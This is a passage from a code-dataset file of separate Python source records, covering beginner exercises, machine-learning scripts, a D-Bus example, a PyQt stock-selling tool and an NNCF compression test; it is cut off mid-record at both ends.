'#':\r\n trees += 1\r\n return trees\r\n\r\nif __name__ == '__main__': \r\n with open(INPUT_FILE_PATH, 'r') as input_file:\r\n map = []\r\n for line in input_file:\r\n map.append(line)\r\n input_file.close()\r\n answer = 1\r\n for slope in SLOPES:\r\n answer *= find_trees(*slope, map)\r\n print(answer)\r\n","sub_path":"day_03_toboggan_trajectory/03_main.py","file_name":"03_main.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"570551398","text":"from AutoEncoder.VAE.vae import VAE\r\nfrom AutoEncoder.VAE.data import Data\r\nfrom AutoEncoder.VAE.learner import Learner\r\nfrom AutoEncoder.VAE.visualizer import Visualizer\r\n\r\nif __name__ == '__main__':\r\n DATA_DIR = 'D:/rawDataFiles/digit_train.csv'\r\n\r\n LEARNING_RATE = 0.0005\r\n EPOCHS = 500\r\n BATCH_SIZE = 3000\r\n\r\n data = Data(DATA_DIR)\r\n target, input = data.import_data()\r\n vae = VAE(LEARNING_RATE)\r\n target = target.to(vae.device)\r\n input = input.to(vae.device)\r\n print(target.shape)\r\n print(input.shape)\r\n\r\n learner = Learner(vae, input, target, batch_size=BATCH_SIZE, epochs=EPOCHS)\r\n model = learner.learn()\r\n\r\n viz = Visualizer(target, model)\r\n viz.viz()\r\n","sub_path":"AutoEncoders/beta_VAE/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"375797752","text":"#!/usr/bin/env python3\n\ntext_space = \"abcdefghijklmnopqrstuvwxyz\"\n\nplain_text = input(\"Enter message, for example HELLO: \").lower()\nshift = int(input(\"Enter shift, for example 6: \"))\n \nlength = len(plain_text)\ncipher_text = \"\"\n\nfor index in range(length):\n letter = plain_text[index]\n init_pos = text_space.find(letter)\n if init_pos < 0:\n cipher_text += \" \"\n else:\n letter_shift = (init_pos + shift) % 26\n cipher_text += text_space[letter_shift]\n \nprint(\"Cipher text: \", cipher_text)\n\n","sub_path":"caesarCipher/caesar_cipher.py","file_name":"caesar_cipher.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"333677850","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.metrics import precision_score, recall_score\nimport pickle\nfrom bs4 import BeautifulSoup\n\n# read data into df\ndef data_to_df():\n df = pd.read_json('data/data.json')\n return df\n\n# add y-value column\ndef add_fraud(df):\n df['fraud'] = df['acct_type'].apply(lambda x: True if x in [u'fraudster_event', u'fraudster', u'fraudster_att'] else False)\n # df.drop('acct_type', axis=1, inplace=True)\n\n# unpack ticket info\ndef unpack_tix(df):\n cost = []\n quantity_sold = []\n quantity_total = []\n\n for i in range(len(df['ticket_types'])):\n line_cost = []\n line_quant = []\n line_total = []\n for j in range(len(df['ticket_types'].values[i])):\n line_cost.append(df['ticket_types'].values[i][j]['cost'])\n line_quant.append(df['ticket_types'].values[i][j]['quantity_sold'])\n line_total.append(df['ticket_types'].values[i][j]['quantity_total'])\n cost.append(line_cost)\n quantity_sold.append(line_quant)\n quantity_total.append(line_total)\n\n df['cost'] = cost\n df['quantity_sold'] = quantity_sold\n df['quantity_total'] = quantity_total\n\n# unpack descriptions into numpy arrays\ndef desc_to_nump(df):\n X = df['description'].values\n y = df['fraud'].values\n # #less effective\n # for i,row in enumerate(X):\n # soup = BeautifulSoup(row,'html.parser')\n # X[i] = soup.get_text()\n return X,y\n\n# create TF-IDF Vectorizer\ndef build_model(X_train,y_train):\n tf = TfidfVectorizer() #stop_words='english'\n bnb = BernoulliNB()\n X_tran = tf.fit_transform(X_train)\n bnb.fit(X_tran,y_train)\n return tf,bnb\n\n# score model on test sample\ndef score_train_test(tf,bnb, X_train, X_test, y_train, y_test):\n X_tran_tr = tf.transform(X_train)\n y_proba = bnb.predict_proba(X_tran_tr)\n y_pred_tr = np.empty_like(y_train)\n for i,row in enumerate(y_pred_tr):\n if i in np.where(y_proba[:,1]>.00001)[0]:\n y_pred_tr[i] = True\n else:\n y_pred_tr[i] = False\n print(\"train recall: {}\".format(recall_score(y_train,y_pred_tr)))\n print(\"train precision: {}\".format(precision_score(y_train,y_pred_tr)))\n print('size: {}'.format(y_pred_tr.sum()))\n\n X_tran_te = tf.transform(X_test)\n y_proba = bnb.predict_proba(X_tran_te)\n y_pred_te = np.empty_like(y_test)\n for i,row in enumerate(y_pred_te):\n if i in np.where(y_proba[:,1]>.00001)[0]:\n y_pred_te[i] = True\n else:\n y_pred_te[i] = False\n print(\"test recall: {}\".format(recall_score(y_test,y_pred_te)))\n print(\"test precision: {}\".format(precision_score(y_test,y_pred_te)))\n print('size: {}'.format(y_pred_te.sum()))\n pass\n\n# pickle models\ndef pickle_models(tf,bnb):\n with open('tf.pickle', 'wb') as handle:\n pickle.dump(tf, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open('bnb.pickle', 'wb') as handle2:\n pickle.dump(bnb, handle2, protocol=pickle.HIGHEST_PROTOCOL)\n\nif __name__ == '__main__':\n df = data_to_df()\n unpack_tix(df)\n add_fraud(df)\n X, y = desc_to_nump(df)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20, random_state=42)\n tf,bnb = build_model(X_train,y_train)\n score_train_test(tf,bnb, X_train, X_test, y_train, y_test)\n pickle_models(tf,bnb)\n","sub_path":"src/description_pred_model.py","file_name":"description_pred_model.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"428503566","text":"\"\"\"Useful functions for the carbon biophysical and valuation models.\"\"\"\n\nimport os\nimport logging\n\nfrom osgeo import gdal\nimport numpy\n\nLOGGER = logging.getLogger('natcap.invest.carbon.utils')\n\ndef make_suffix(model_args):\n '''Return the suffix from the args (prepending '_' if necessary).'''\n try:\n file_suffix = model_args['suffix']\n if not file_suffix.startswith('_'):\n file_suffix = '_' + file_suffix\n except KeyError:\n file_suffix = ''\n return file_suffix\n\n\ndef setup_dirs(workspace_dir, *dirnames):\n '''Create the requested directories, and return the pathnames.'''\n dirs = {name: os.path.join(workspace_dir, name) for name in dirnames}\n for new_dir in dirs.values():\n if not os.path.exists(new_dir):\n LOGGER.debug('Creating directory %s', new_dir)\n os.makedirs(new_dir)\n if len(dirs) == 1:\n return dirs.values()[0]\n return dirs\n\n\ndef sum_pixel_values_from_uri(uri):\n '''Return the sum of the values of all pixels in the given file.'''\n dataset = gdal.Open(uri)\n band = dataset.GetRasterBand(1)\n nodata = band.GetNoDataValue()\n total_sum = 0.0\n # Loop over each row in out_band\n for row_index in range(band.YSize):\n row_array = band.ReadAsArray(0, row_index, band.XSize, 1)\n total_sum += numpy.sum(row_array[row_array != nodata])\n return total_sum\n","sub_path":"natcap/invest/carbon/carbon_utils.py","file_name":"carbon_utils.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"105073007","text":"#!/usr/bin/env python\n#\n# This file is part of python-tdbus. Python-tdbus is free software\n# available under the terms of the MIT license. See the file \"LICENSE\" that\n# was provided together with this source file for the licensing terms.\n#\n# Copyright (c) 2012 the python-tdbus authors. See the file \"AUTHORS\" for a\n# complete list.\n\n\n# This example shows how to listen for signals. Here we listen for any signal named \"Hello\" on interface\n# com.example.Hello but signal_handler() also accepts keyword arguments to only listen for\n# specific signals.\n\nfrom __future__ import print_function, unicode_literals\nfrom __future__ import division, absolute_import\n\nimport sys\nimport tdbus\n\nimport gevent\n\nif not hasattr(tdbus, 'GEventDBusConnection'):\n print('gevent is not available on this system')\n sys.exit(1)\n\nfrom tdbus import GEventDBusConnection, DBUS_BUS_SESSION, signal_handler, DBusHandler, method\n\n\nclass GEventHandler(DBusHandler):\n\n @signal_handler(interface=\"com.example.Hello\")\n def Hello(self, message):\n print('signal received: %s, args = %s' % (message.get_member(), repr(message.get_args())))\n\n @method(interface=\"com.example.Hello\")\n def HelloMethod(self, message):\n print('signal received: %s, args = %s' % (message.get_member(), repr(message.get_args())))\n\n @method(interface=\"org.freedesktop.DBus.Introspectable\")\n def Introspect(self, message):\n \"\"\"Return DBus introspection data for debugging\n\n @see: http://dbus.freedesktop.org/doc/dbus-specification.html#introspection-format\n \"\"\"\n if message.get_path() == '/':\n xml = \"\"\"\n\n \n\"\"\"\n\n else:\n xml = \"\"\"\n \n \n \n \n \n \n \n \n \n \"\"\"\n\n self.set_response(\"s\", [xml])\n\nconn = GEventDBusConnection(DBUS_BUS_SESSION)\nhandler = GEventHandler()\nconn.add_handler(handler)\n\nprint('Listening for signals, with gevent dispatcher.')\nprint('In another terminal, issue:')\nprint()\nprint(' $ dbus-send --session --type=signal --dest={} /com/example/TDBus com.example.Hello.Hello'.format(conn.get_unique_name()))\nprint(' $ dbus-send --session --print-reply --type=method_call --dest={} /com/example/TDBus com.example.Hello.HelloMethod'.format(conn.get_unique_name()))\nprint()\nprint('Press CTRL-c to exit.')\nprint()\n\n\nfrom gevent.hub import get_hub\ntry:\n get_hub().switch()\nexcept KeyboardInterrupt:\n pass\n\n","sub_path":"examples/dispatch_gevent.py","file_name":"dispatch_gevent.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"574499678","text":"import random\n\ndef proofType():\n p = ['Head', 'Arm', 'Leg', 'Tooth', 'Lock of Hair', 'Ring', 'Any', 'Armor']\n p = random.choice(p)\n return p\n\ndef killType():\n t = ['Look like an accident', 'brutal public murder', 'silent assassination', 'sabotage']\n t = random.choice(t)\n t = t.title()\n return t\n\ndef weaponUsed():\n w = ['poison', 'simple melee weapon', 'simple ranged weapon',\n 'martial melee weapon', 'martial ranged weapon', 'any']\n w = random.choice(w)\n w = w.title()\n return w\n\ndef guardKill():\n g = ['Yes','No']\n g = random.choice(g)\n return g\n\ndef Objectives():\n g = guardKill()\n p = proofType()\n t = killType()\n w = weaponUsed()\n return p, t, w, g","sub_path":"bountyUtils/bountyObjectives.py","file_name":"bountyObjectives.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"288133785","text":"def solution(arr, K):\n answer = 0\n size = len(arr)\n for i in range(size-2):\n for j in range(i+1, size-1):\n for k in range(j+1, size):\n tot = sum([arr[i], arr[j], arr[k]])\n answer += 1 if tot % K == 0 else 0\n print(f'{arr[i]}, {arr[j]}, {arr[k]}, tot={tot}, answer={answer}')\n return answer\n\nif __name__ == \"__main__\":\n arr, k = [1,2,3,4,5], 3\n print(f'arr={arr}, k={k}, answer={solution(arr,k)}');","sub_path":"cp1_2_04_multiple_of_k.py","file_name":"cp1_2_04_multiple_of_k.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"430651090","text":"\"\"\"\nMerge some NHANES data files to produce a dataset that can\nbe used to demonstrate the Kockoff FDR procedure.\n\nwget https://wwwn.cdc.gov/Nchs/Nhanes/2003-2004/DR1TOT_C.XPT\n\nwget https://wwwn.cdc.gov/Nchs/Nhanes/2003-2004/BPX_C.XPT\n\nwget https://wwwn.cdc.gov/Nchs/Nhanes/2003-2004/BMX_C.XPT\n\nwget https://wwwn.cdc.gov/Nchs/Nhanes/2003-2004/DEMO_C.XPT\n\"\"\"\n\nimport pandas as pd\n\ndx0 = pd.read_sas(\"DEMO_C.XPT\")\ndx0 = dx0[[\"SEQN\", \"RIDAGEYR\", \"RIAGENDR\", \"DMDEDUC2\", \"RIDRETH1\"]]\n\ndx1 = pd.read_sas(\"BMX_C.XPT\")\ndx1 = dx1[[\"SEQN\", \"BMXBMI\"]]\n\ndx2 = pd.read_sas(\"BPX_C.XPT\")\ndx2 = dx2[[\"SEQN\", \"BPXSY1\"]]\n\ndx3 = pd.read_sas(\"DR1TOT_C.XPT\")\nseqn = dx3.SEQN\ndx3 = dx3.loc[:, \"DR1TKCAL\":]\ndx3[\"SEQN\"] = seqn\n\ndx = pd.merge(dx0, dx1, left_on=\"SEQN\", right_on=\"SEQN\")\ndx = pd.merge(dx, dx2, left_on=\"SEQN\", right_on=\"SEQN\")\ndx = pd.merge(dx, dx3, left_on=\"SEQN\", right_on=\"SEQN\")\n\n","sub_path":"LargeScale/nhanes_data.py","file_name":"nhanes_data.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"65893225","text":"import json\n\ndef gather_text(schema, current_path):\n for key, value in schema.items():\n if key in ('title', 'description') and isinstance(value, str):\n yield value, current_path + '/' + key\n if isinstance(value, dict):\n yield from gather_text(value, current_path + '/' + key)\n\n\ndef extract(fileobj, keywords, comment_tags, options):\n schema = json.loads(fileobj.read().decode())\n for text, current_path in gather_text(schema, ''):\n yield 1, '', text, [current_path]\n\n# for lineno, funcname, messages, comments in results:\n\n\n","sub_path":"standard/schema/utils/jsonschema_extract.py","file_name":"jsonschema_extract.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"285277085","text":"# Is a number prime?\n\n# Define a function that takes one integer argument and returns logical\n# value true or false depending on if the integer is a prime\n\n# You can assume you will be given an integer input.\n\n# You can not assume that the integer will be only positive. You may be\n# given negative numbers as well (or 0).\n\n# NOTE on performance: There are no fancy optimizations required, but\n# still the most trivial solutions might time out. Numbers go up to\n# 2^31 or 2,147,483,648 (or similar, depends on language version). Looping all the way\n# up to n, or n/2, will be too slow.\n\nimport pytest\n\ndef is_prime(num):\n # Return false for negatives and even numbers, except 2\n if num <= 1: return False\n if num == 2 or num == 3 or num == 5: return True\n if num % 2 == 0 or num % 3 == 0 or num % 5 == 0:\n return False\n\n i = 5\n while i ** 2 < num:\n if num % i == 0 or num % (i + 2) == 0: return False\n i += 6\n\n return True\n\nnumbers = [\n (5, True),\n (9, False),\n (17, True),\n (25, False),\n (30, False),\n (37, True),\n]\n\n@pytest.mark.parametrize('num, result', numbers)\ndef test_prime(num, result):\n assert is_prime(num) == result\n","sub_path":"Python/tests/test_IsPrime.py","file_name":"test_IsPrime.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"566274966","text":"\"\"\"\n@ File: batch_sell_main.py\n@ Author: pleiadesian\n@ Datetime: 2020-02-14 08:55\n\"\"\"\nimport os\nimport sys\nimport math\nimport tushare as ts\nimport smtplib\nimport datetime\nimport frontend.batch_sell as bs\nimport api.ts_map as tm\nfrom email.mime.text import MIMEText\nfrom email.header import Header\nfrom frontend import setfocus\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QMessageBox, QWidget\nfrom PyQt5.QtCore import QTimer\n\nINTERVAL = 3000\nWATCHING_GREEN = 0\nWATCHING_RED = 1\n\n\ndef get_new_a1p(codes):\n infos = ts.get_realtime_quotes(codes).values\n a1ps = []\n for info in infos:\n # get ask price 1\n a1ps.append(float(info[21]))\n return a1ps\n\n\nclass BatchSellMain(QMainWindow, bs.Ui_MainWindow):\n def __init__(self, parent=None):\n super(BatchSellMain, self).__init__(parent)\n self.setupUi(self)\n self.window_info = setfocus.init_fs()\n self.codes = []\n self.price = dict()\n self.amount = dict()\n self.watch = dict()\n self.watching = False\n self.watching_mode = WATCHING_GREEN\n self.call_auction_complete = False\n\n self.timer = QTimer(self)\n self.timer.timeout.connect(self.check_watch)\n self.timer.start(INTERVAL)\n\n def confirm(self):\n price_text = self.lineEdit_price.text()\n code_text = self.lineEdit_stock.text()\n amount_text = self.lineEdit_amount.text()\n percent_text = self.lineEdit_percent.text()\n watch_text_low = self.lineEdit_watch_price_low.text()\n watch_text_high = self.lineEdit_watch_price_high.text()\n\n if watch_text_low == '':\n if price_text == '':\n QMessageBox.question(self, \"警告\", \"卖出价格未设置!\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n price = float(price_text)\n if price > 10.0:\n QMessageBox.question(self, \"警告\", \"价格设置过低!\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n if amount_text == '':\n amount_text = '全仓卖出'\n sell_amount = None\n else:\n amount = int(amount_text)\n if amount <= 0 or amount % 100 != 0:\n QMessageBox.question(self, \"警告\", \"持仓数填写错误!\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n if percent_text == '':\n percent = 1\n percent_text = '1'\n else:\n if float(percent_text) < 1:\n QMessageBox.question(self, \"警告\", \"卖出比例填写错误!\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n percent = 1 / float(percent_text)\n sell_amount = math.ceil(amount * percent / 100) * 100\n amount_text = '持仓' + amount_text + '股 卖出' + str(sell_amount) + '股' + '(1/' + percent_text + '仓位)'\n if code_text in self.codes:\n QMessageBox.question(self, \"警告\", \"该股票已加入卖出计划!\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n if code_text not in tm.name_mapping:\n QMessageBox.question(self, \"警告\", \"检测到股票代码输入错误,请重新输入(注意股票代码之间必须有且仅有1个空格)\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n\n new_line = code_text + ' ' + tm.name_mapping[code_text] + ' 低' + price_text + '% ' + amount_text + '\\n'\n self.label_stock.setText(self.label_stock.text() + new_line)\n self.codes.append(code_text)\n self.price[code_text] = price_text\n if sell_amount is not None:\n self.amount[code_text] = str(sell_amount)\n else:\n price_low = float(watch_text_low)\n price_high = float(watch_text_high)\n new_line = code_text + ' ' + tm.name_mapping[code_text] + ' 监控卖出 止损:' + watch_text_low + ' 止盈:' + \\\n watch_text_high\n self.label_stock.setText(self.label_stock.text() + new_line)\n self.codes.append(code_text)\n self.watch[code_text] = (price_low, price_high)\n\n def delete(self):\n code_text = self.lineEdit_stock.text()\n stock_text = self.label_stock.text()\n if code_text not in self.codes:\n QMessageBox.question(self, \"警告\", \"该股票代码未加入卖出计划\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n new_text = ''\n stocks = stock_text.split('\\n')\n for stock in stocks:\n if stock.startswith(code_text):\n continue\n new_text += stock + '\\n'\n self.label_stock.setText(new_text)\n self.codes.remove(code_text)\n del self.price[code_text]\n if code_text in self.amount:\n del self.amount[code_text]\n\n def check_watch(self):\n if self.watching:\n if self.watching_mode == WATCHING_GREEN:\n a1_ps = get_new_a1p(self.codes)\n if len(a1_ps) != len(self.codes) or len(self.codes) == 0:\n QMessageBox.question(self, \"警告\", \"检测到股票代码输入错误,请重新输入(注意股票代码之间必须有且仅有1个空格)\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n self.pushButton_watch_sell.setText('监控卖出')\n self.watching = False\n return\n for code, ask_price in zip(self.codes, a1_ps):\n sell_price_low = self.watch[code][0]\n sell_price_high = self.watch[code][1]\n if sell_price_low > ask_price:\n setfocus.sell_code(code, str(ask_price), None, self.window_info)\n self.codes.remove(code)\n del self.watch[code]\n self.send_email(code + '已自动卖出')\n elif sell_price_high < ask_price:\n self.send_email(code + '已突破预期价格')\n else:\n if '09:24:00' < datetime.datetime.now().strftime('%H:%M:%S') < '09:25:00':\n a1_ps = get_new_a1p(self.codes)\n if len(a1_ps) != len(self.codes) or len(self.codes) == 0:\n assert False\n for code, ask_price in zip(self.codes, a1_ps):\n sell_price = str(round(ask_price * (1 - float(self.price[code]) / 100), 2))\n if code in self.amount:\n amt = self.amount[code]\n else:\n amt = None\n setfocus.sell_code(code, sell_price, amt, self.window_info)\n self.codes = []\n self.watch.clear()\n self.send_email('红盘集合竞价卖出完毕')\n\n def watch_sell_start_green(self):\n if self.pushButton_watch_sell_green.text() == '绿盘监控卖出':\n self.pushButton_watch_sell_green.setText('取消')\n self.pushButton_sell.setEnabled(False)\n self.pushButton_watch_sell_red.setEnabled(False)\n self.watching_mode = WATCHING_GREEN\n self.watching = True\n else:\n self.pushButton_watch_sell_green.setText('绿盘监控卖出')\n self.pushButton_sell.setEnabled(True)\n self.pushButton_watch_sell_red.setEnabled(True)\n self.watching = False\n\n def watch_sell_start_red(self):\n if self.pushButton_watch_sell_red.text() == '红盘监控卖出':\n self.pushButton_watch_sell_red.setText('取消')\n self.pushButton_sell.setEnabled(False)\n self.pushButton_watch_sell_green.setEnabled(False)\n self.watching_mode = WATCHING_RED\n self.watching = True\n else:\n self.pushButton_watch_sell_red.setText('红盘监控卖出')\n self.pushButton_sell.setEnabled(True)\n self.pushButton_watch_sell_green.setEnabled(True)\n self.watching = False\n\n def batch_sell_start(self):\n a1_ps = get_new_a1p(self.codes)\n if len(a1_ps) != len(self.codes) or len(self.codes) == 0:\n QMessageBox.question(self, \"警告\", \"检测到股票代码输入错误,请重新输入(注意股票代码之间必须有且仅有1个空格)\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n return\n for code, ask_price in zip(self.codes, a1_ps):\n sell_price = str(round(ask_price * (1 - float(self.price[code]) / 100), 2))\n if code in self.amount:\n amt = self.amount[code]\n else:\n amt = None\n setfocus.sell_code(code, sell_price, amt, self.window_info)\n QMessageBox.question(self, \"提示\", \"批量委托卖出完毕\",\n QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)\n\n @staticmethod\n def send_email(text):\n sender = '574402791@qq.com'\n password = os.getenv('MAIL_PASSWORD')\n receivers = 'wzl574402791@outlook.com'\n smtp_server = 'smtp.qq.com'\n\n # 三个参数:第一个为文本内容,第二个 plain 设置文本格式,第三个 utf-8 设置编码\n message = MIMEText(text, 'plain', 'utf-8')\n message['From'] = Header(sender)\n message['To'] = Header(receivers)\n message['Subject'] = Header('股价预警', 'utf-8')\n\n while True:\n try:\n server = smtplib.SMTP_SSL(host=smtp_server)\n server.connect(host=smtp_server, port=465)\n\n server.login(sender, password)\n server.sendmail(sender, receivers, message.as_string())\n break\n except smtplib.SMTPException:\n continue\n\n def select_zx(self):\n if self.radioButton_zx.isChecked():\n self.window_info = setfocus.change_fs('中信')\n\n def select_ct(self):\n if self.radioButton_ct.isChecked():\n self.window_info = setfocus.change_fs('财通')\n\n def select_tdx(self):\n if self.radioButton_tdx.isChecked():\n self.window_info = setfocus.change_fs('通达')\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n batch_sell_main = BatchSellMain()\n batch_sell_main.show()\n app.exec_()\n","sub_path":"frontend/batch_sell_main.py","file_name":"batch_sell_main.py","file_ext":"py","file_size_in_byte":10940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"223029020","text":"from flask import Flask, render_template, redirect, request, session\nimport csv\nimport uuid\n\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET'])\n@app.route('/list', methods=['GET'])\ndef route_list(*argv):\n with open('stories.csv', 'r') as csvfile:\n stories = []\n for row in csvfile:\n stories.append(row.split(';'))\n return render_template('list.html', stories=stories)\n\n\n@app.route('/story', methods=['GET', 'POST'])\n# using form.html template\n# add new story for the /story page, it is an empty form with a create button\ndef route_story():\n if request.method == 'GET':\n return render_template('form.html')\n\n with open('stories.csv', 'a') as csvfile:\n exportdata = csv.writer(csvfile, delimiter=';',\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\n exportdata.writerow([str(uuid.uuid4())[:6], \\\n request.form['title'], \\\n request.form['descr'], \\\n request.form['accr'], \\\n request. form['businessvalue'], \\\n request. form['estimation'], \\\n request. form['status']])\n\n return 'The new User Story Has been Created!'\n\n\n# @app.route('/story/', methods=['GET', 'POST'])\n# using form.html\n# the same form as /story page, but filled in with data of the given User Story\n# Update button should update existing entry, not create a new\n# def route_edit(story_id=None):\n# formdata = cgi.FieldStorage()\n# title = formdata.getvalue('title')\n# with open (\"stories.csv\")\n# return render_template('form.html', story_id=story_id)\n\n\nif __name__ == '__main__':\n # app.secret_key = '4Rkj4jo'\n app.run(debug=True, port=5000)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"584275652","text":"#from PIL import Image\nfrom PIL.ExifTags import TAGS, GPSTAGS\nimport glob\nimport cv2\nimport matplotlib.pyplot as plt\nimport json\nimport piexif\nfrom exif import Image\nimport sys\nimport os\n\n\nim_path = sys.argv[1]\n\nfolder = im_path.split('/')[0] + '/' + im_path.split('/')[1]\n\nexif_folder = folder + '/exif'\nexif_list = glob.glob(exif_folder + '/*')\n\nf = open(exif_list[0])\ndata = json.load(f)\n\nim_name = im_path.split('/')[-1].split('.')[0]\nnew_im_name = folder + '/localize/' + im_name + 'exif.jpg'\n\n#dummy gps info so there is no error in sfm!\nGPSInfo = {1: 'N', 2: ((36, 1), (7, 1), (5263, 100)), 3: 'W', 4: ((115, 1), (8, 1), (5789, 100)), 5: b'\\x00', 6: (241175, 391), 7: ((19, 1), (8, 1), (40, 1)), 12: 'K', 13: (0, 1), 16: 'T', 17: (1017664, 4813), 23: 'T', 24: (1017664, 4813), 29: '2019:01:11', 31: (65, 1)}\n\nwith open(im_path, 'rb') as image_file:\n \n im = Image(image_file)\n \n im.make = data['make']\n im.model = data['model']\n \n im.camera = data['camera']\n \n im.GPSInfo = GPSInfo\n \n \nwith open(new_im_name, 'wb') as new_image_file:\n new_image_file.write(im.get_file())\n\n\nwith open(new_im_name, 'rb') as image_file:\n imtest = Image(image_file)\n \nos.system('rm '+ im_path)\n\nos.system('cp ' + exif_list[0] + ' ' + exif_list[0] + '1')\n\nos.system('mv ' + exif_list[0] + '1' + ' ' + exif_folder +'/' +im_name + 'exif.jpg.exif')\n","sub_path":"ICG/write_exif2file.py","file_name":"write_exif2file.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"319188899","text":"\"\"\"\n Copyright (c) 2021 Intel Corporation\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nimport pytest\nfrom functools import partial\n\nimport torch\nfrom torch import nn\nfrom torch.optim import SGD\nfrom torch.nn import functional as F\n\nfrom nncf.torch import AdaptiveCompressionTrainingLoop\nfrom nncf.torch import EarlyExitCompressionTrainingLoop\nfrom nncf.torch.initialization import register_default_init_args\n\nfrom tests.torch.helpers import create_compressed_model_and_algo_for_test\nfrom tests.torch.helpers import LeNet\nfrom tests.torch.helpers import create_ones_mock_dataloader\nfrom tests.torch.helpers import set_torch_seed\nfrom tests.torch.sparsity.magnitude.test_helpers import get_basic_magnitude_sparsity_config\nfrom tests.torch.quantization.test_quantization_helpers import get_quantization_config_without_range_init\n\n\ndef create_finetuned_lenet_model_and_dataloader(config, eval_fn, finetuning_steps,\n learning_rate=1e-3):\n with set_torch_seed():\n train_loader = create_ones_mock_dataloader(config, num_samples=10)\n model = LeNet()\n for param in model.parameters():\n nn.init.uniform_(param, a=0.0, b=0.01)\n\n data_loader = iter(train_loader)\n optimizer = SGD(model.parameters(), lr=learning_rate)\n for _ in range(finetuning_steps):\n optimizer.zero_grad()\n x, y_gt = next(data_loader)\n y = model(x)\n loss = F.mse_loss(y.sum(), y_gt)\n loss.backward()\n optimizer.step()\n\n config = register_default_init_args(config,\n train_loader=train_loader,\n model_eval_fn=partial(eval_fn, train_loader=train_loader))\n model, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)\n return model, train_loader, compression_ctrl\n\n\n@pytest.mark.parametrize(\n ('max_accuracy_degradation',\n 'final_compression_rate',\n 'reference_final_metric'),\n (\n ({'maximal_relative_accuracy_degradation': 0.01}, 0.66742, 0.996252),\n ({'maximal_relative_accuracy_degradation': 100.0}, 0.94136, 0.876409),\n ({'maximal_absolute_accuracy_degradation': 0.10}, 0.767040, 0.938572),\n )\n)\ndef test_adaptive_compression_training_loop(max_accuracy_degradation,\n final_compression_rate,\n reference_final_metric,\n num_steps=10, learning_rate=1e-3,\n initial_training_phase_epochs=5,\n patience_epochs=3,\n init_finetuning_steps=10):\n def validate_fn(model, epoch=0, train_loader=None):\n with set_torch_seed():\n train_loader = iter(train_loader)\n loss = torch.FloatTensor([0])\n with torch.no_grad():\n for _ in range(num_steps):\n x, y_gt = next(train_loader)\n y = model(x)\n loss += F.mse_loss(y.sum(), y_gt)\n return 1 - loss.item()\n\n input_sample_size = [1, 1, LeNet.INPUT_SIZE[-1], LeNet.INPUT_SIZE[-1]]\n config = get_basic_magnitude_sparsity_config(input_sample_size=input_sample_size)\n\n params = {\n \"initial_training_phase_epochs\": initial_training_phase_epochs,\n \"patience_epochs\": patience_epochs,\n }\n params.update(max_accuracy_degradation)\n accuracy_aware_config = {\n \"accuracy_aware_training\": {\n \"mode\": \"adaptive_compression_level\",\n \"params\": params\n }\n }\n\n config.update(accuracy_aware_config)\n\n model, train_loader, compression_ctrl = create_finetuned_lenet_model_and_dataloader(config,\n validate_fn,\n init_finetuning_steps)\n\n def train_fn(compression_ctrl, model, 